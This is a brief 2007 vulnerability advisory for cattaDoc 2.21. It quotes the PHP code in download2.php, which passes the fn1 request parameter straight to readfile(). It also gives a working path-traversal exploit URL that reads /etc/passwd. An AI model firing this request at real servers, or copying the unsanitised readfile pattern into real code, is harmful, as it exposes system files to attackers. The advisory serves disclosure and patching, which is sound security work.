cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability

2007-04-12T00:00:00
ID SECURITYVULNS:DOC:16678
Type securityvulns
Reporter Securityvulns
Modified 2007-04-12T00:00:00

Description

cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability

D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz

Discovered by: GolD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

V.Code:

$tp = $_REQUEST['mtp']; #

$ofn = '"'.$_REQUEST['fn2'].'"'; #

header("Content-type: $tp");

header("Content-Disposition: attachment; filename=$ofn");

readfile($_REQUEST['fn1']); <<----

Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd

milw0rm.com [2007-04-06]